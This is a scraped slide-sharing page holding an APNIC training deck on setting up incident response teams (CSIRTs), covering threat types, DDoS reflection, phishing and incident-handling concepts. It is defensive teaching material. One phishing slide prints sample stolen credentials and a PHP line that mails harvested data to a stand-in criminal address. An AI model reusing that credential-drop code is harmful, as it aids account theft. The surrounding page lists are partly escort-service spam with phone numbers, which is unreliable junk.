Mon cirt khaltarMon cirt khaltar
Mon cirt khaltar
 

Similar to Setting up CSIRT

Ethical Hacking and Cybersecurity – Key Trends in 2022
Ethical Hacking and Cybersecurity – Key Trends in 2022Ethical Hacking and Cybersecurity – Key Trends in 2022
Ethical Hacking and Cybersecurity – Key Trends in 2022
PECB
 
Today's Breach Reality, The IR Imperative, And What You Can Do About It
Today's Breach Reality, The IR Imperative, And What You Can Do About ItToday's Breach Reality, The IR Imperative, And What You Can Do About It
Today's Breach Reality, The IR Imperative, And What You Can Do About It
Resilient Systems
 
Colorado-Society-of-CPAs-Cybersecurity-Presentation-v3_Feb8.pptx
Colorado-Society-of-CPAs-Cybersecurity-Presentation-v3_Feb8.pptxColorado-Society-of-CPAs-Cybersecurity-Presentation-v3_Feb8.pptx
Colorado-Society-of-CPAs-Cybersecurity-Presentation-v3_Feb8.pptx
AkramAlqadasi1
 
Hunting: Defense Against The Dark Arts v2
Hunting: Defense Against The Dark Arts v2Hunting: Defense Against The Dark Arts v2
Hunting: Defense Against The Dark Arts v2
Spyglass Security
 
Self Defending Applications
Self Defending ApplicationsSelf Defending Applications
Self Defending Applications
Michael Coates
 

Similar to Setting up CSIRT (20)

Threat_Modelling.pdf
Threat_Modelling.pdfThreat_Modelling.pdf
Threat_Modelling.pdf
 
WHOIS Database for Incident Response & Handling
WHOIS Database for Incident Response & HandlingWHOIS Database for Incident Response & Handling
WHOIS Database for Incident Response & Handling
 
Ethical Hacking and Cybersecurity – Key Trends in 2022
Ethical Hacking and Cybersecurity – Key Trends in 2022Ethical Hacking and Cybersecurity – Key Trends in 2022
Ethical Hacking and Cybersecurity – Key Trends in 2022
 
Today's Breach Reality, The IR Imperative, And What You Can Do About It
Today's Breach Reality, The IR Imperative, And What You Can Do About ItToday's Breach Reality, The IR Imperative, And What You Can Do About It
Today's Breach Reality, The IR Imperative, And What You Can Do About It
 
Protecting Your Business - All Covered Security Services
Protecting Your Business - All Covered Security ServicesProtecting Your Business - All Covered Security Services
Protecting Your Business - All Covered Security Services
 
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
 
Cybersecurity by the numbers
Cybersecurity by the numbersCybersecurity by the numbers
Cybersecurity by the numbers
 
ASEAN-JAPAN Cyber Security Seminar: How to fill your team gaps with training
ASEAN-JAPAN Cyber Security Seminar: How to fill your team gaps with trainingASEAN-JAPAN Cyber Security Seminar: How to fill your team gaps with training
ASEAN-JAPAN Cyber Security Seminar: How to fill your team gaps with training
 
Colorado-Society-of-CPAs-Cybersecurity-Presentation-v3_Feb8.pptx
Colorado-Society-of-CPAs-Cybersecurity-Presentation-v3_Feb8.pptxColorado-Society-of-CPAs-Cybersecurity-Presentation-v3_Feb8.pptx
Colorado-Society-of-CPAs-Cybersecurity-Presentation-v3_Feb8.pptx
 
Cybersecurity: Malware & Protecting Your Business From Cyberthreats
Cybersecurity: Malware & Protecting Your Business From CyberthreatsCybersecurity: Malware & Protecting Your Business From Cyberthreats
Cybersecurity: Malware & Protecting Your Business From Cyberthreats
 
Cyber Resiliency
Cyber ResiliencyCyber Resiliency
Cyber Resiliency
 
Cyber security for business
Cyber security for businessCyber security for business
Cyber security for business
 
System Security Beyond the Libraries
System Security Beyond the LibrariesSystem Security Beyond the Libraries
System Security Beyond the Libraries
 
Hunting: Defense Against The Dark Arts v2
Hunting: Defense Against The Dark Arts v2Hunting: Defense Against The Dark Arts v2
Hunting: Defense Against The Dark Arts v2
 
File000119
File000119File000119
File000119
 
Incident Response in the wake of Dear CEO
Incident Response in the wake of Dear CEOIncident Response in the wake of Dear CEO
Incident Response in the wake of Dear CEO
 
Prevention is not enough
Prevention is not enoughPrevention is not enough
Prevention is not enough
 
Self Defending Applications
Self Defending ApplicationsSelf Defending Applications
Self Defending Applications
 
Cambodia CERT Seminar: Incident response for ransomeware attacks
Cambodia CERT Seminar: Incident response for ransomeware attacksCambodia CERT Seminar: Incident response for ransomeware attacks
Cambodia CERT Seminar: Incident response for ransomeware attacks
 
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016
 

More from APNIC

More from APNIC (20)

APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
 
APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOG
 
IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119
 
draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119
 
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
 
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
 
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
 
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
 
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
 
NANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff HustonNANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff Huston
 
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff HustonDNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
 
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, ThailandAPAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
 
Lao Digital Week 2024: It's time to deploy IPv6
Lao Digital Week 2024: It's time to deploy IPv6Lao Digital Week 2024: It's time to deploy IPv6
Lao Digital Week 2024: It's time to deploy IPv6
 
AINTEC 2023: Networking in the Penumbra!
AINTEC 2023: Networking in the Penumbra!AINTEC 2023: Networking in the Penumbra!
AINTEC 2023: Networking in the Penumbra!
 
CNIRC 2023: Global and Regional IPv6 Deployment 2023
CNIRC 2023: Global and Regional IPv6 Deployment 2023CNIRC 2023: Global and Regional IPv6 Deployment 2023
CNIRC 2023: Global and Regional IPv6 Deployment 2023
 
AFSIG 2023: APNIC Foundation and support for Internet development
AFSIG 2023: APNIC Foundation and support for Internet developmentAFSIG 2023: APNIC Foundation and support for Internet development
AFSIG 2023: APNIC Foundation and support for Internet development
 

Recently uploaded

VVIP Pune Call Girls Mohammadwadi WhatSapp Number 8005736733 With Elite Staff...
VVIP Pune Call Girls Mohammadwadi WhatSapp Number 8005736733 With Elite Staff...VVIP Pune Call Girls Mohammadwadi WhatSapp Number 8005736733 With Elite Staff...
VVIP Pune Call Girls Mohammadwadi WhatSapp Number 8005736733 With Elite Staff...
SUHANI PANDEY
 
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Delhi Call girls
 
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
 
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
 
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubai
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls DubaiDubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubai
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubai
kojalkojal131
 
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
soniya singh
 
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
Neha Pandey
 
Real Escorts in Al Nahda +971524965298 Dubai Escorts Service
Real Escorts in Al Nahda +971524965298 Dubai Escorts ServiceReal Escorts in Al Nahda +971524965298 Dubai Escorts Service
Real Escorts in Al Nahda +971524965298 Dubai Escorts Service
Escorts Call Girls
 
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
tanu pandey
 
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
Diya Sharma
 
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
Busty Desi⚡Call Girls in Vasundhara Ghaziabad >༒8448380779 Escort Service
Busty Desi⚡Call Girls in Vasundhara Ghaziabad >༒8448380779 Escort ServiceBusty Desi⚡Call Girls in Vasundhara Ghaziabad >༒8448380779 Escort Service
Busty Desi⚡Call Girls in Vasundhara Ghaziabad >༒8448380779 Escort Service
Delhi Call girls
 
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
tanu pandey
 
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
SUHANI PANDEY
 
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLLucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
imonikaupta
 
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
SUHANI PANDEY
 

Recently uploaded (20)

VVIP Pune Call Girls Mohammadwadi WhatSapp Number 8005736733 With Elite Staff...
VVIP Pune Call Girls Mohammadwadi WhatSapp Number 8005736733 With Elite Staff...VVIP Pune Call Girls Mohammadwadi WhatSapp Number 8005736733 With Elite Staff...
VVIP Pune Call Girls Mohammadwadi WhatSapp Number 8005736733 With Elite Staff...
 
Trump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts SweatshirtTrump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts Sweatshirt
 
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
 
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
 
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
 
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubai
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls DubaiDubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubai
Dubai=Desi Dubai Call Girls O525547819 Outdoor Call Girls Dubai
 
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
 
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
 
Real Escorts in Al Nahda +971524965298 Dubai Escorts Service
Real Escorts in Al Nahda +971524965298 Dubai Escorts ServiceReal Escorts in Al Nahda +971524965298 Dubai Escorts Service
Real Escorts in Al Nahda +971524965298 Dubai Escorts Service
 
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersMoving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
 
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
 
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
₹5.5k {Cash Payment}New Friends Colony Call Girls In [Delhi NIHARIKA] 🔝|97111...
 
Real Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtReal Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirt
 
Russian Call Girls in %(+971524965298 )# Call Girls in Dubai
Russian Call Girls in %(+971524965298 )# Call Girls in DubaiRussian Call Girls in %(+971524965298 )# Call Girls in Dubai
Russian Call Girls in %(+971524965298 )# Call Girls in Dubai
 
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
 
Busty Desi⚡Call Girls in Vasundhara Ghaziabad >༒8448380779 Escort Service
Busty Desi⚡Call Girls in Vasundhara Ghaziabad >༒8448380779 Escort ServiceBusty Desi⚡Call Girls in Vasundhara Ghaziabad >༒8448380779 Escort Service
Busty Desi⚡Call Girls in Vasundhara Ghaziabad >༒8448380779 Escort Service
 
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
 
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
Ganeshkhind ! Call Girls Pune - 450+ Call Girl Cash Payment 8005736733 Neha T...
 
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLLucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
 
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
 

Setting up CSIRT

  • 1. Issue Date: Revision: Setting up Computer Security Incident Response Teams (CSIRTS) Adli Wahid Security Specialist adli@apnic.net 05 June 2014 V 1.1
  • 2. About Me •  Adli Wahid •  Current Role –  Security Specialist, APNIC •  Previous Roles –  Cyber Security Manager, Bank of Tokyo-Mitsubishi UFJ –  VP Cyber Security Response Services, CyberSecurity Malaysia & Head of Malaysia CERT (MYCERT) –  Lecturer, International Islamic University Malaysia •  Follow APNIC and me on Twitter! –  @apnic && @adliwahid 3
  • 3. Agenda •  Cyber Threats Landscape •  Setting up Computer / Cyber Security Response Team •  Tools for incident handling and analysis •  Exercises 4
  • 4. 1.0 Cybersecurity & the Threat Landscape 5
  • 5. So you do ‘Security’? 6
  • 6. 7
  • 7. Cyber Security Frame Work •  How do we think about security? •  Ensuring the CIA –  Confidentiality, Integrity, Availability •  Collection of activities to address Risk –  Risk = Threats x Vulnerabilities –  Dealing with the Known & and Unknown •  People, Process, Technology •  Dynamic & Continuous Approach –  Including Learning from Incidents –  Applying Best Current Practices 8 C I A
  • 8. NIST Cyber Security Framework 9 RESPOND
  • 9. The Threat Landscape •  Highlights of cyber security incidents •  What they mean for a CERT / CSIRT? •  Understanding risk and impact associated with the threats or incidents •  Thinking about actions required for dealing with the incidents 10
  • 10. Cyber Threats •  Malware Related •  Data Breaches •  Distributed Denial of Service Attacks •  Web Defacement •  Spam •  Phishing •  Scanning / Attempts •  Content Related 11
  • 11. Malware-Related •  The Problem –  Malicious software have different infection vectors and ‘payloads’ –  Different consequences once a computer is infected –  Millions of infected Computers –  Complex ‘infrastructure’ for spreading malware and controlling infected computers 12
  • 12. Malware-Related •  Different Types of Malware –  Bots & Botnets –  Ransomware –  ExploitKits •  What do CSIRTs have to Handle? –  Infected computers –  Infection points •  Command & Controls •  Web Sites –  Organise Take-Downs Efforts (Conficker, DNSChanger) –  Write Advisory (for removal) –  Work with Law Enforcement Agencies 13
  • 13. 14
  • 14. 15 DNS Changer Working Group http://www.dnwg.org
  • 16. DoS and DDoS •  DoS: –  source of attack small # of nodes –  source IP typically spoofed •  DDoS –  From thousands of nodes –  IP addresses often not spoofed •  What you need to Handle –  Source of DDoS attack •  What if IP is spoofed? –  Victim of DDoS attack –  Services/Sites facilitating DDoS attacks •  Help promote BCP38 / Source Address Validation too! 17
  • 17. Distributed DoS: DDos 18 Internetattacker victim bot bot bot bot Attacker takes over many machines, called “bots”. Potential bots are machines with vulnerabilities. bot processes wait for command from attacker to flood a target
  • 18. DDoS: Reflection attack 19 attacker victim DNS server DNS server DNS server DNS server request request request request reply reply reply reply Source IP = victim’s IP
  • 19. DDoS: Reflection attack •  Spoof source IP address = victim’s IP •  Goal: generate lengthy or numerous replies for short requests: amplification –  Without amplification: would it make sense? •  January 2001 attack: –  requests for large DNS record –  generated 60-90 Mbps of traffic •  Reflection attack can be also be done with Web and other services 20
  • 21. Data Breaches •  The Problem –  Thousands and Hundreds of Credentials (username and passwords) being exposed and shared publicly •  By accident or or purpose •  i.e. on scribd •  CSIRTs/CERTs are contacted to handle / co-ordinate so that accounts are not further abused •  Handling –  Contacting the owners of credentials –  Contacting owner of system where credentials are being dumped •  SQL injection vulnerability, Misconfiguration –  Improving authentication mechanism (2FA?) –  Removing the credentials 22
  • 22. Phishing •  The Problem –  Active attempt to trick users to give credentials –  Use a combination of email, social media and fake websites •  What needs to be handled –  Source of Phishing Email –  Fake website –  Credentials stolen –  Accounts or sites collecting phishing credentials (drop sites) 23
  • 23. Dear Intelligent User, We have introduced a new security feature on our website. Please reactivate your account here: http://www.bla.com.my p.s This is NOT a Phish Email Login Password din:1234567 joey:cherry2148 boss:abcdefgh123 finance:wky8767 admin:testtest123 <? $mailto=‘criminal@gmail.com’; mail($mailto,$subject, $message); ?> Phishing Example 24 1 2 3 4
  • 24. Spam •  The Problem –  Unsolicited Emails –  Waste of bandwith, cost money –  Leads to other problems •  What you need to handle –  Source of email 25
  • 26. Only 5 out of 42 AVs Detect This 27
  • 27. Compromised Web Sites •  The Problem –  Web sites compromised leading to defacement or abused for other types of attacks –  Possibly caused by https://www.owasp.org/index.php/ Category:OWASP_Top_Ten_Project –  Mass Defacements –  Pre-Announced Attacks •  What you need to handle / co-ordinate –  Contacting owner of the website –  Handling the source of attack 28
  • 28. Recap on Cyber Threats •  Understanding the different types of cyber threats is the first step before you start handling or responding to the incidents •  Abuse or IRT contacts could be the first to be contacted •  Questions to ask –  How does it work? –  What are the impact? –  What do we have to ‘handle’? –  Who should I contact / escalate? –  What should be prioritized? •  CSIRTS/CERTS can be contacted at the different stages of the attacks or incidents 29
  • 29. 2.0 Incident handling & Response Framework 30
  • 30. Outcomes of this Module 1.  Understand the importance of responding and handling security incidents 2.  Familiar with the requirements for setting up a CERT / CSIRT 3.  Identify organisations to connect with for collaboration & cooperation 31
  • 31. 32
  • 32. Incidents Happens! •  Despite your best efforts keep the internet safe, secure and reliable – things happens •  What we have seen –  Malware, Botnets, Exploit Kits, Ramsomware, DDoS Attacks, Anonymous, 0-days, Web Defacement –  Data Breaches and Disclosures –  And Many more! •  What is the worst that can happen to you? 33
  • 33. Incident Happens! (2) •  Incident may affect –  Your Organisation –  Your Customers –  Your country (think Critical Infrastructure) •  Must be managed in order to –  Limit Damage –  Recover (Fix/Patch) –  Prevent recurrence –  Prevent Further Abuse 34
  • 34. Exercise-1 •  You might have an incident already •  Visit www.zone-h.com/archive •  Enable filters –  Insert domain •  Let’s Discuss –  What can we learn from this? –  What is the risk for publication of defaced websites? –  Going back to our formula: Risk = Threats + Vulnerabilities 35
  • 35. Exercise-1: Discussion •  Detection –  How do I know about incidents affecting me •  Analysis –  How ‘bad’ is the situation –  Google for ZeusTracker, MalwareDomainList •  Recover –  How do I fix this •  Lessons Learned –  How can we prevent this happening in the future –  Think PPT! –  Can series of action be co-ordinated? 36
  • 36. Whois Database IRT Object •  IRT - Incident Response Team •  Reporting of network abuse can be directed to specialized teams such as Incident Response Teams (IRTs) •  Implemented in AP region by policy Prop-079 in November 2010. –  Mandatory for inetnum, inet6num and aut-num, objects created and updated in whois database •  In essence, the contact information must be reachable and can do something about an incident! 37
  • 37. inetnum: 1.1.1.0 - 1.1.1.255 netname: APNIC-LABS descr: Research prefix for APNIC Labs descr: APNIC country: AU admin-c: AR302-AP tech-c: AR302-AP mnt-by: APNIC-HM mnt-routes: MAINT-AU-APNIC-GM85-AP mnt-irt: IRT-APNICRANDNET-AU status: ASSIGNED PORTABLE changed: hm-changed@apnic.net 20140507 changed: hm-changed@apnic.net 20140512 source: APNIC irt: IRT-APNICRANDNET-AU address: PO Box 3646 address: South Brisbane, QLD 4101 address: Australia e-mail: abuse@apnic.net abuse-mailbox: abuse@apnic.net admin-c: AR302-AP tech-c: AR302-AP auth: # Filtered mnt-by: MAINT-AU-APNIC-GM85-AP changed: hm-changed@apnic.net 20110922 source: APNIC Whois Database Incident Response Team Object 38
  • 38. What is incident? •  ITIL terminology defines an incident as: –  Any event which is not part of the standard operation of a service and which causes, or may cause, an interruption to, or a reduction in, the quality of that service •  ISO27001 defines an incident as: –  any event which is not part of the standard operation of a service and which causes or may cause an interruption to, or a reduction in, the quality of that service. 39
  • 39. Incident Response vs. Incident Handling? •  Incident Response is all of the technical components required in order to analyze and contain an incident. –  Skills: requires strong networking, log analysis, and forensics skills. •  Incident Handling is the logistics, communications, coordination, and planning functions needed in order to resolve an incident in a calm and efficient manner. [isc.sans.org] 40
  • 40. What is Event? •  An “event” is any observable occurrence in a system and/or network •  Not all events are incidents but all incidents are events 41
